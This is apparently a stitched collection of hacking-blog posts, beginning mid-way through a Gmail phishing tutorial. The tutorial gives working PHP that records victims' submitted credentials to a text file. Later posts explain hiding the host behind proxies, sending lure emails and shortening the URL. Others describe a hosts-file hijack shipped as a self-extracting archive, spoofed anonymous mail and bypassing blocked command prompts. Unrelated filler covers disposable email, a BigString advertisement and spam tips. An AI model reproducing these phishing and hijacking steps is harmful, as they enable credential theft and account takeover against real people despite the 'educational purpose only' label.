 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with

action="http://yoursite urlhere/login.php"

 save the file.
Step6:
Now you need to create login.php
 so you need to open the notepad and type as

<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: 
create an email with gmail keyword.
 like : gmailburger@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.



 Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.

Different types of Email Account Hacking

The Basic level Hacking is Email Account Hacking.  Everyone like to do first email account hacking only.  So here is the tutorial for budding hackers about email Hacking.

There are different types of Email Account Hacking .  Here is some of them :

1. Social Engineering
   
   • Phishing
2. Brute Force Attack
3.  Keylogger
4.  Guessing the Answer for the Security Question

Social Engineering:

Social engineering takes advantage of the weakest link in any organization’s
information security defenses: people. Social engineering is
“people hacking” and involves maliciously exploiting the trusting nature of
human beings to obtain information that can be used for personal gain.

Social engineering is one of the toughest hacks to perpetrate because it takes
great skill to come across as trustworthy to a stranger. It’s also by far the
toughest hack to protect against because people are involved.

Social Engineering is different from Physical Security exploits . In social engineering hackers will analyze about
victim.  Hackers will send mail to victim.  The contents will be related to the victim.

Eg:

✓ False support personnel claim that they need to install a patch or new
version of software on a user’s computer, talk the user into downloading
the software, and obtain remote control of the system.
✓ False vendors claim to need to update the organization’s accounting
package or phone system, ask for the administrator password, and
obtain full access.
✓ Phishing e-mails sent by external attackers gather user IDs and passwords
of unsuspecting recipients. Hackers then use those passwords to
gain access to bank accounts and more. A related attack exploits crosssite
scripting on Web forms.
✓ False employees notify the security desk that they have lost their keys
to the computer room, receive a set of keys from security, and obtain
unauthorized access to physical and electronic information.

 Phishing WebPage:

     It is a fake webpage which looks similar to the original page of the website.  Using this WebPage we can easily get the Password of victims.  The process involved in creating Phishing webpage are,
✓ First Visit the Website which is associated with the email id. Copy the Source code.
✓ Edit the the Source code such that it will store the password for you.
✓ Upload the Webpage to any free webhosting sites.  (don't select a famous hosting site,they will find that
    your page is fake). Try uploading through the proxy server.

Guessing the Answer for Security Question:
    Do you remember that the mail sites will ask for the security questions to retrieve the mail account?  You can hack the mail account simply guessing the answer.  If the victim is your friend ,then it may very easy to hack. 

Brute Force Attack:



A famous and traditional attacking method .  In this method ,the password will be found by trying all possible passwords with any program or software.




Keyloggers:


  It is one of the spyware which will capture what you type in the keyboard.  so whenever you type the username and password ,it will simply capture.

   It is software program which will be attached with any softwares and send to victim.  While victim install the software ,the keylogger also start to work.  Keyloggers are exe files.



Note:
This Email Account Hacking Tutorial is truly for educational purpose only.

Use Original Domain Address for Phishing Web page

Hi friends ,  you may have known about how to create phishing web Page.  If you don't know about Phishing Web Page, you need to read this tutorials first:

        Different Types of Email account
        How To Create fake or phishing web page

Once you know the basics of Phishing web Page ,come to this post.

Ok friends, there's one drawback in our traditional Phishing web page method. You know what is it? You are right, the url of our phishing web page. It may look like the real one,but it is not.


For eg: we may create the Phishing web page with www.gmails.com but it's not at all same as www.gmail.com

Probably, the experienced internet users will notice the URL of web Page. So they won't fall in our Fishnet.

What we are going to do now?
Why should not we make the phishing web page's URL looks exactly same as the real Domain Name? You may ask "is it possible?". My answer is yes, you can. It sounds good na? go ahead.

How we are going to implement?
 We are going to send an email with an executable to victim.
If the victim double click the executable file, then you are done.
Now whenever the victim enter the real domain name (like www.facebook.com) ,he will be in our phishing web page.
Don't worry the domain name is original URL(like www.facebook.com)

Got surprised....!!!! You may ask how this is done,go ahead.

How it is done?
   Executable file will change the Host file of Victim system. 
What is host file?
     The host file contains Domain Name and IP address associated with them.  Your host file will be in this path:

C:\Windows\System32\drivers\etc\

Whenever we enter the Domain name or URL (for eg: www.webaddress.com), a query will be send to the DNS (Domain Name server).  This DNS connect to the IP address which is associated with the Domain Name.   But before this to be done, the host file in our system will check for the IP address associated with the Domain Name.  Suppose we make an entry with Domain Name and IP address of our phishing web page(for  eg: www.webaddress.com wiht our ip 123.23.X.X),then there's no query will be send to the DNS.
It will automatically connect to the IP address associated with the Domain Name.  This will fruitful for us to mask the PHISHING web page's URL with Original Domain Name.


Now Let's divide into the Implementation:

• If you are hosting some other hosting site, probably you won't get the unique IP address for your Phishing Web Page. You can have the IP Address of the hosting only. So if you try to use that IP address, the victim will not bring to your Phishing web page , they will bring to the hosting address.
  

So what you can do overcome this problem? You need to set up your own Webserver in home. Using Webserver softwares you can set up your own Hosting service.

  Your computer should be turned on always. Because if you turned off the computer,then probably host will not be in online. Again it will be available when you turned on. So your computer turned on when victim visits your site.

How To set up Your own server?
  Download the  Webserver softwares like WAMP,XAMP(Both are open source software, I meant they are free ).  My suggestion is WAMP.  Because it is my favorite one.  It is easy to use.

Downlad the wamp server from http://www.wampserver.com/

Install the WAMP server.  After installation completed, Go to this folder path:

C:\Wamp\WWW

And paste your phishing web page here.

Start the Wamp Server.
(Start->windows->All Programs->Wamp Server->start wamp server)

you can see the half circle icon(wamp server icon) in system tray(i mean near to the time). Click the icon and select the start all services.

Now type your ip address in address bar of the web browser and hit enter. If you don't know your ip address ,visit www.whatismyip.com.

Now you can see your Phishing web page in your Browser.

Modifying the Host file :
 Copy the Host file from this path "C:\WINDOWS\system32\drivers\etc" to desktop.  Right click on the host file and open with Notepad.

You can see the localhost entry there.
Below that type as :

your_ip     domain_name

For eg:
123.xx.xx.xx www.gmail.com
.
 Save the File.

Compress the Host File:

    Compress hosts file such that when victim opens it, it automatically gets copied to default
location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.
 
Right click on the Hosts file and select the Add to archieve option.  Now follow the steps which is shown in picture:

Now send the zipped file to victim.  If he extract the zip file, then the hosts file will be replaced.
You are done.  Now whenever he try to visit the genuine or original website, the phishing webpage only will be shown.


Some Disadvantages of this Hack:

•    If your IP address is dynamically changed ,then it is hard to implement it
•   If your victim is advanced user,he may notice the certificates of site which is shown by browser.

Don't worry it is not at all big problem.   Just try it ane enjoy it.

Temporary Disposable Email address Services

 While signing up to an online account or doing such stuff on web, you can use these temporary disposable email addresses provided by email services. This keeps your real email address protected from spam. These services provide you with email addresses of the format you desire. Temporary email addresses last for time duration varying from few hours to some months, depending on the type of service you use.

6 Best Temporary Disposable Email address providers:

Just check out the below list for some of the best disposable email address services:


1. Mailinator:
This is one of the top rated temporary email providers which provides you address of the format something@mailinator.com

2. Yopmail:
Another temporary email address service with good user-friendly email interface. I have tried many services and found yopmail having one of the best interfaces. What more, don't need any cubersome registration process. Simply enter any desired email address and Yopmail has it.

3. Spamgourmet:
This is efficient spam blocker temporary email address service which has also got good reviews elsewhere on web.

4. Jetable:
This is multi-functinal temporary inbox provider which allows you to define time span for which your temporary inbox will be valid. Also, you can forward the temporary inbox mails to your real email address.

5. Spambox:
One of the best feature of this service is time span of disposable email address can be as long as 1 year. This is really a large span. It provides all other features for temporary email address.

6. Mailexpire:
Create an alias email address for your real email address. Mailexpire provides you temporary email address for as long as 3 months. If you want to delete alias mail id instantly, you are always provided with a link to delete your alias temporary disposable email address.

You can now send a self destruction Email from Big string

Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?

Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.


BigString takes the risk out of email

Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.

BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.

BigString lets you have second thoughts

BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.

You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.

BigString takes the danger out of clicking

BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.

BigString is easy to use

BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!

Here are just a few of the many applications of BigString Erasable, Recallable, Non-Printable Email.

Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.

On-Line Daters: You don't want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you'll allow a picture to be viewed before it disappears. BigString protects your privacy!

Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!

Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking "send" is no longer an action "carved in stone." Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You're the boss with BigString.This is great trick for you .  You can now send a self destruction.  After users reads the mail ,the mail will be deleted automatically.  You might remember the world famous scene of Mission Impossible in which after the message has been heard once the message destroys itself. Now it is possible for everybody to have such facility.

 

        Get a free account

How you are getting large number of spam mail ? Know why

Are you getting lot of spam mails to your inbox?  Do you know why it comes to your mail? The mistake is yours only.  Because of you only you are getting larger number of spam.  How you responsible for that? Go ahead to know what is your mistake.

Spam Mail Definition:
Also known as junk mail.  Sending large number of identical message to numerous recipients .   Advertisers ,merchants sends large number of mail to recipients for advertising purpose using softwares and some websites.



How they get your email id?
They get your mail id because of your mistakes only.

Social Networking Sites:
Most of you use social networking sites daily.  I won't say using social networking sites is bad.  But sending request or accepting stranger is one of the major reason for getting spam mail.  Advertisers will gain your weakness.  If you are blindly accepting the request means, spam mail will be definitely in your mail. Sometimes they get your phone number and send advertisement to your mobile or some other communication sources.

What you have to do?
Apply privacy setting for your contact information.  Don't accept the request from strangers(in order to attract you they may send you request like a girl).

Online Games and contests:
Some websites tell you that they will give prize if you win in the online game.  This is also one of the reason for getting spam mail.

Job /Career websites:
Job offering websites is the major reason for getting spam mail.  But some website sell your mail to advertisers.  This will result in spam.

Forum:
Like i said for social networking site, in forum also you have to consider the privacy settings.
 
Select "Don't show mail and Don't receive mail from members" so that you can avoid of getting spam mails.

Mail Searching:
Advertisers(spammers) search for mail id in internet using some softwares(like @mail.com )
If you are webmaster ,you may give contactus link with
mailto:mailid@domain.com.
Spammers  can find your mail id if you give the mail id plainly like this.
 tips:

• Use 123 contact forms for hiding your mail id.
• or show mail id like this : mailid[at]domain[dot]com
• Use mail Badge Image(i mean show your mail id as image).

Overall suggestion:
Use two mail id.  One is for contributing in online.  Other one is personal.

How to Access Multiple Gmail accounts in Firefox without logout?

are you having multiple gmail accounts? As far as browsers concerned , we can login with only one gmail account. Here i am going to introduce a new Mozilla add on. This add on will allow you to login in multiple account without logout the accounts.

How to do?

visit:

https://addons.mozilla.org/firefox/addon/748

and Install the Add on.

Now visit:

http://userscripts.org/scripts/show/16341

click on “Install” button located at the top right side.


Now you can access multiple gmail accounts. You can see the drop down box at the top right side.

Change the user as your wish without logout.

Enjoy !

Don't trust all script . Sometimes These scripts will harmful for you. So verify whether it is not harmful by searching in google.

How to send Anonymous Mail to anyone|Set up your own server

Everyone Like to send Anonymous Mail to your enemy or friend or teacher.  Here is the Hacking tutorial for you to implement that.  So i hope This will be best hack for you.

What is the Use?
   I explained you in my older post how to get ip address.  To get the ip address you need to send the mail with link.  So You can send mail to your victim with that link such that you are contacting from an organization.

For Eg:
You can say we are from Facbook,we have new feature to enable the feature visit this page.

How to do?

Step 1:
First of all you need to register in free web hosting service which has PHP feature.  So my choice is

       x10hosting.com

Step 2:
Now Download this zip file:

             Mail.php

Inside the file you can find the mail.php file. Extract the file

Step 3:
Now Go to x10hosting.com and login with your username and password.
Upload the "mail.php" file to "public_html" folder.

Step 4:
That's all you finished.
Now go to this page

         yourhosturl/mail.php

Change the yourhosturl with your website url which you gave it when you register in x10hosting.com
For eg:
yourfavorites.x10.mx/mail.php

Usually the default will be "name.x10.mx"

When you visit you will see the form just like this:

Fill the form with your victim mail address and message subject and send

Alternative for Command prompt. Use if cmd is blocked

Most of Internet cafe or some other public access computer has command prompt blocked.  Command prompt is blocked for some security reasons.  But without command prompt it is very hard to hack the networking system or the same pc.



There are several tweaks and hacks to enable command prompt, but it is so much tricky. I am introducing you with a nice alternative for command prompt.

Have a look at the screenshot. It supports all the features that Command Prompt does. Even all the wild cards that can be used in DOS(Disk Operating System).

Download it from here:

                    http://www.gammadyne.com/gs.exe

It is actually a DOS Shell, which interpets user command same as in DOS.